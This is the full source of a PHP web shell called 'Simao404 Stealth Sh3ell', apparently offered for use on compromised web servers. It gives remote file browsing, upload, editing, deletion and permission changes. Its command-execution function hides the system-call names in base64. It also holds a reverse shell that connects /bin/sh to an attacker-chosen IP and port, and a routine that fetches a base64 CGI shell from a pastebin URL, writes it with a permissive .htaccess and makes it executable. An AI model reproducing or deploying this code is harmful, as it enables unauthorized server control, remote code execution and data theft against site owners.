Simao404 shell

1. <?php
2.  
3. echo '<title>SIMAO Sh3ell</title>';
4.  
5. @session_start();
6.  
7.  
8.  
9.  
10.  
11. echo "<fontstyle=\"  position: center;
12.    right: 0px;
13.    left: 0px;
14.    top: 0px;\" >
15.    <font color= #0000FF>kernel </font>~ :: ";
16. echo php_uname();
17. echo " <br> <font color= #0000FF> user </font>~ ::";
18. echo "(".get_current_user().")";
19. echo " <br> <font color= #0000FF>php_verion</font> ~ ::";
20. echo phpversion();
21. echo " <br> <font color= #0000FF>hdd </font>~ ::";
22. echo round(disk_total_space("/") / (1024*1024*1024) ,2).".GB".":|:free space ~".round(disk_free_space("/") / (1024*1024*1024),2).".GB";
23.  
24. echo "</font>
25.  
26.  
27. ";
28.  
29. echo '
30. <HEAD>
31. <H1><center>[#]  Stealth Sh3ell Simao [#] </center></H1>
32.  
33. <style>
34. body{
35. font-family: "Courier New";
36. background-color: #f6f5f5;
37. }
38. </style>';
39. echo " <style>
40. p.rigth
41. {
42.      
43.        position: absolute;
44.    right: 0px;
45.    top: 0px;
46.    padding: 10px;
47.      
48. }
49. .button {
50.    background-color: red;
51.    border: none;
52.    color: white;
53.    padding: 10px 20px;
54.    text-align: center;
55.    text-decoration: none;
56.    display: inline-block;
57.    margin: 4px 2px;
58.    cursor: pointer;
59. }
60. .button1 {font-size: 11px;}
61. </style>
62. <p class=rigth> <a href=?killed=kill> <button class='button button1'> delete me </button></a></p>";
63.  
64. if (isset($_GET['killed']))
65. {
66.      msh_lkhra();
67. }
68. if (isset($_GET['cgi']))
69. {
70.     cgidzb();
71. }
72. function msh_lkhra()
73. {
74.      
75.       if(isset($_POST['yes']))
76.       {
77.       @unlink(basename(__FILE__));
78.       die("<center> <h1> ~ sh3ell deleted ~ </h1></center>");
79.       exit;
80.       }
81.       else
82.       {
83.         die("<center> <form method=post><input type=submit name=yes value='yes Delete it'></center>");
84.       }
85.  
86. }
87. if (isset($_POST['updzb']))
88. {
89.   if (!empty($_FILES['torabi']['name'])){
90.   $nm = $_FILES['torabi']['name'];
91.   $tm = $_FILES['torabi']['tmp_name'];
92.   move_uploaded_file($tm,"".$nm);
93.   echo "<center> uploaded </br> <a href=$nm>$nm</a></center>";
94. }
95. }
96. else
97. {
98.   print("<center><form method=POST enctype='multipart/form-data'> <input type=file name=torabi><input type=submit name=updzb value=up></center>");
99.  
100. }
101. if (isset($_GET['delete']))
102. {
103.   echo "<form method=post>";
104.   echo "<center>are u ser to delete this file ?</center>";
105.   echo "<center> <input type=submit name=yes value=yes></center>";
106.   if (isset($_POST['yes'])):
107.  
108.    unlink($_GET['delete']);
109.  
110.   echo "<center> File Deleted :v </br> <a href=?path=".getcwd()."> back !</a></center>";
111.   endif;
112.   exit;
113. }
114. class files //class tchof lfiles  files :D
115. {
116.     //const simao = "<title> SIMAO404 StEalth Sh3ell </title>";  
117.     public function files()
118.     {
119.          
120.         //$rc = base64_encode(getcwd());
121. $get = getcwd();
122. $di = explode('/',$get); // /var/www/...b /  
123.  
124. echo " <center><meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"> <link rel=\"stylesheet\" href=\"https://www.w3schools.com/w3css/4/w3.css\"> <body>  <div class=\"w3-container\"> <a href=?cgi=zby>   <input type=\"button\" class=\"w3-button w3-black\" value=\" [!] cgi sh3ell [!]  \"/> &nbsp;  </a>   <a href=?path=$get > <input type=\"button\" class=\"w3-button w3-black\" value=\" [!] show files [!] \"> &nbsp; </a>   <a href=?cmd=zby> <input type=\"button\" class=\"w3-button w3-black\" value=\"     [!] CMD [!] \"></a>   <a href=?back=conect> <input type=\"button\" class=\"w3-button w3-black\" value=\"                       [!] Back connect [!] \"></a>     </body></center>";
125. echo "<center>";
126.  
127. foreach ($di as $num => $pat) {
128.  
129.    
130.     echo "<a href=?path=";
131.     for ($i=0; $i<=$num; $i++)
132.     {
133.    
134.     echo ($di[$i])."/";
135.      }
136.  
137.     echo ">$pat/</a>";
138.  
139.    echo '</td></tr><tr><td>';
140.  
141.      } echo " <form method=post> <input style='font-size: 11px;' type=submit name=creatdir value=new_dir>  ";
142.  if(isset($_POST['creatdir']))
143.    
144.     {
145.  
146.         echo "<center> <form method=post> <br> <input type=text name=filname placeholder='newdir'> <br></br><input type=submit name=creatdir value=create></center>";
147.  
148.         if (isset($_POST['creatdir']))
149.         {
150.            
151.             if(@mkdir(@$_POST['filname'])):
152.                  print("<center> dir created </center>");
153.  
154.             endif;
155.         }
156.         exit;
157.         //exit;
158.     }
159.    
160.     echo " <form method=post> <input type=submit style='font-size: 11px;'name=creatfile value=new_file>  ";
161.  if(isset($_POST['creatfile']))
162.    
163.     {
164.  
165.         echo "<center> <form method=post> <br> <input type=text name=filname placeholder='newfile' > <br></br><input type=submit name=creatfile value=create></center>";
166.  
167.         if (isset($_POST['creatfile']))
168.         {
169.            
170.             if(@fopen(@$_POST['filname'],"a")):
171.                  print("<center> file created </center>");
172.             endif;
173.         }
174.         exit;
175.     }
176.    
177.    
178.  
179.     $a = (@$_GET['path']);
180.     $z = @scandir($a); //scandir
181.     if ($z == true)
182.     {
183.  
184.             foreach($z as $lol)
185.         {
186.  
187.          
188.           if (is_file("$a/$lol")) //$a/$lol = lpath true
189.           {
190.  
191.            if (is_writable("$a/$lol")):
192.          
193.              
194.              
195.             echo "</br>";
196.              
197.             echo " <font color=green> writable -> </font> <a href=?edite=$a/$lol>$lol </a> ".round(filesize("$a/$lol") / 1024,2)." kb"." : =>  <a href=?delete=$a/$lol> <font color='red'> D </font>  <a href=?rename=$a/$lol>   <font color='#FFBF00'> R </font>  </a> <a href=?chmod=$a/$lol> <font color=\"black\"> P </a>";
198.           else :
199.             echo "</br>";
200.              
201.             echo " <font color=red> not writable -> </font>  <a href=?edite=$a/$lol>$lol </a> ".round(filesize("$a/$lol") / 1024,2)." kb"."  : =>  <a href=?delete=$a/$lol> <font color='red'> D </font>  <a href=?rename=$a/$lol>   <font color='#FFBF00'> R </font>  </a> <a href=?chmod=$a/$lol> <font color=\"black\"> P </a>";
202.             endif;
203.  
204.           }
205.           elseif(is_dir("$a/$lol"))
206.           {
207.            
208.             echo "</br>";
209.             echo " dir~ <a href=?path=$a/$lol> <font color=#0B6121 >[$lol]</font ></a> <a href=?dirrename=$a/$lol> <font color=black > R </a> </a> <a href=?deletdir=$a/$lol> <font color=red > D</font> </a> ";
210.           }
211.  
212.  
213.         }
214. }
215.     echo "</center>";
216.  
217.     }
218. }
219.  
220.  
221.  
222. class dir_or_file extends files //extend dzb
223. {
224.  
225.   public function chek()
226.   {
227.     if (isset($_GET['edite']))
228.     {    
229.         //echo parent::simao;
230.         $z = $_GET['edite'];
231.         echo "<form method=post> <center><br> <textarea style='width: 720px; height: 260px' name=chngfile >".htmlspecialchars(  @file_get_contents($z))."</textarea> <br><input type=submit name=chang value='edite'><br> </center>";
232.         if(isset($_POST['chang'])):
233.        
234.  
235.         if(@file_put_contents($z,$_POST['chngfile'])):
236.         echo "<br><center> <font color=green> file changed :D</font></center>";
237.         $f = getcwd();
238.         exit(@header("Location:?path=$f"));
239.         else:
240.             echo "<br><center> <font color=red> error edite file  </font></center>";
241.         //echo "</textarea></center>";
242.         endif;
243.         endif;
244.        
245.     }
246.   }
247. }
248.  
249.  
250. class edite extends dir_or_file //exte
251. {
252.  
253.     public $ok;
254.  
255.    
256. }
257.  
258.  
259.  
260.  
261.  
262. $z = new edite();
263.  
264. $z->chek();
265. function back_con()
266. {
267.     $ip = $_SERVER['REMOTE_ADDR'];
268.     echo "<center> [?] b3ack conect [?] <form method=post> </br></br> your ip :: <input type=text name=ip value=$ip> port :: <input type=text name=port value=21> &nbsp; <input type=submit name=con value=con3ect>";
269.     $addr = @$_POST['ip'];
270.     $por = @$_POST['port'];
271.     if (isset($_POST['con']))
272.     {
273.  
274.  
275.                $sock = @fsockopen($addr,$por,$errno,$errstr,20);
276.                if (!$sock):
277.                 echo "<br> error in conect or fsockopen desabled";
278.                exit;
279.                endif;
280. if ($sock)
281. {
282. $descriptorspec = array(
283.    0 => array("pipe", "r"),  
284.    1 => array("pipe", "w"),
285.    2 => array("pipe","w")  
286. );
287.      
288.  
289.  
290. $process = proc_open("/bin/sh -i", $descriptorspec, $pipes);
291.  
292. if (is_resource($process)) {
293.    
294.      
295.   while (true) {
296.    
297.    
298.  
299.  
300.    
301.     if (feof($pipes[1])) {
302.         echo "</br>";
303.         print("Connection terminated atbi ");
304.         exit;
305.     }
306.  
307.     $read_a = array($sock, $pipes[1], $pipes[2]);
308.     $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
309.  
310.    
311.     if (in_array($sock, $read_a)) {
312.          
313.         $input = fread($sock,true);
314.          
315.         fwrite($pipes[0], $input);
316.     }
317.  
318.    
319.     if (in_array($pipes[1], $read_a)) {
320.          
321.         $input = fread($pipes[1],true);
322.          
323.         fwrite($sock, $input);
324.     }
325.  
326.    
327.     if (in_array($pipes[2], $read_a)) {
328.          
329.         $input = fread($pipes[2],true);
330.          
331.         fwrite($sock, $input);
332.     }
333. }
334. }
335. proc_close($process);
336.  
337. }
338.     }
339. }
340. if (isset($_GET["dirrename"]))
341. {  
342.     $dirone = @$_GET["dirrename"];
343.     echo "<center> </br> <form method=post > old_name ::<input style='width:333px;' type=text name=direone value=$dirone> &nbsp; rename to :: <input style='width:333px;' type=text name=newdir value=$dirone>&nbsp; <input type=submit name=ren value='rename'></center>";
344.     $newnamedir = @$_POST["newdir"];
345.     if (isset($_POST["ren"]))
346.    
347.        
348.     {
349.        
350.         @rename("$dirone","$newnamedir");
351.         die("<center></h1> <font color=green>renamed </font></h1></center>");
352.         exit(@header("Location:?path="));
353.     }
354. }
355.  
356. function cgidzb()
357. {
358.     @mkdir("Simao");
359.     @chdir("Simao");
360.     $f = fopen(".htaccess","w") or die("error in open file :/");
361.     $d = "Options all
362. DirectoryIndex Sux.html
363. AddType text/plain .php
364. AddType application/x-httpd-cgi .sa
365. AddHandler server-parsed .php
366. AddHandler cgi-script .sa
367. AddHandler cgi-script .sa";
368.  
369.    fwrite($f,$d);
370.    fclose($f);
371.    $cgi = file_get_contents("https://pastebin.com/raw/BjVAmEbR");
372.    $cgi_data = base64_decode($cgi);
373.    $yawyaw = "simao.sa";
374.    $gg = fopen($yawyaw,"w+") or die("error in open the sh3ll");
375.    fwrite($gg,$cgi_data);
376.    fclose($gg);
377.    @chmod($yawyaw,0755);
378.    echo '<center><br><a href=Simao/simao.sa> <font color=black >[+] :D fk yeah cgi sh3ell created [+]</font></br></a><center>';
379.    exit;
380. }
381.  
382.  
383.  
384.  
385. function shells() ////////////////// hna exec
386. {
387. $mo = "<center> no function to exec found in sv  :/ </center>";
388. switch($mo)
389. {
390.  
391.    
392.   case(function_exists(base64_decode("c2hlbGxfZXhlYw=="))):
393.   $se = base64_decode("c2hlbGxfZXhlYw==");
394.   echo "<center> <form method=post><input type=text name=cm placeholder='cmd dzb'><input type=submit name=cmd value=own> <br></br></center>";
395.     echo "<center><textarea style='color: green; width:800;height: 280px; '> ".$se(@$_POST['cm'])."</textarea></center>";
396.   break;
397.   case(function_exists(base64_decode("cGFzc3RocnU="))):
398.   $pt = base64_decode("cGFzc3RocnU=");
399.   echo "<center> <form method=post><input type=text name=cm placeholder='cmd dzb'><input type=submit name=cmd value=own> <br></br></center>";
400.     echo "<center><textarea style='color: green; width:800;height: 280px;'> ";
401.     echo @$pt(@$_POST['cm']);
402.     echo "</textarea></center>";
403.     break;
404.     case(function_exists(base64_decode("c3lzdGVt"))):
405.     $sy = base64_decode("c3lzdGVt");
406.     echo "<center> <form method=post><input type=text name=cm placeholder='cmd dzb'><input type=submit name=cmd value=own> <br></br></center>";
407.     echo "<center><textarea style='color: green; width:800;height: 280px;'> ";
408.     @$sy(@$_POST['cm']);
409.     echo "</textarea></center>";
410.     break;
411.     case(function_exists(base64_decode("ZXhlYw=="))):
412.     $ex = base64_decode("ZXhlYw==");
413.     echo "<center> <form method=post><input type=text name=cm placeholder='cmd dzb'><input type=submit name=cmd value=own> <br></br></center>";
414.     echo "<center><textarea style='color: green; width:800;height: 280px;'> ";
415.     echo @$ex(@$_POST['cm']);
416.     echo "</textarea></center>";
417.     break;
418.     default:
419.   echo $mo;
420. }
421. }
422. if (isset($_GET['back']))
423. {
424.     back_con();
425. }
426. if (isset($_GET['cmd']))
427. {
428.   shells();
429.   exit;
430. }
431. if (isset($_GET["chmod"]))
432. {
433.     chmd();
434.     exit;
435. }
436. //echo edite::simao;
437.  
438. if (isset($_GET['deletdir']))
439. {
440.     $the_dir = @$_GET['deletdir'];
441.     if(rmdir($the_dir)):
442.        echo "<center> dir deleted </center>";
443.     endif;
444. }
445.  
446. if (isset($_GET['rename']))
447. {
448. ethic();
449. }
450.  
451. function ethic()
452. {
453.   echo "<center>";
454.   echo "<form method=post>";
455.   echo "the old name : "."<input style='width:400;' type=text name='oldfile' value=".@$_GET["rename"]."></br>";
456.   echo "nut name azby :"."<input style='width:400;'type=text name='newfile' value=".@$_GET["rename"]." >
457.       <br><input type=submit name=rn value='rename'>";
458.   if (isset($_POST['rn'])):
459.  
460.   $old = @$_POST['oldfile'];
461.  
462.   $new = @$_POST['newfile'];
463.   rename($old,$new);
464.   echo "<font color=red > file renamed to $new </font> <br> <a href=?path=".getcwd()."> back !</a> ";
465.  
466.     endif;
467.     echo "</center>";
468.     exit;
469.  
470. }
471. function chmd()
472. {
473.     $hh = @$_GET["chmod"];
474.  
475.     echo "<br><center>";
476.     echo "<form method=POST> file ::<input style='width:300px;' type=text name=old_pr value=$hh> to  prems ::<input style='width:45px;' type=text name=prem placeholder='0666'> <input type=submit name=pr value=change >" ;
477.     if (isset($_POST['pr']))
478.     {
479.         $p = @$_POST['prem'];
480.     @chmod($hh,$p);
481.     echo "primis changed";
482. }
483.     echo "</center>";
484. }
485.  /*echo "<font style=\"  position: absolute;
486.     right: 0px;
487.     left: 0px;
488.     top: 0px;\" > krenek ~ ".php_uname()."</font>
489. }
490.  
491. ";
492. */
493.  
494. ?>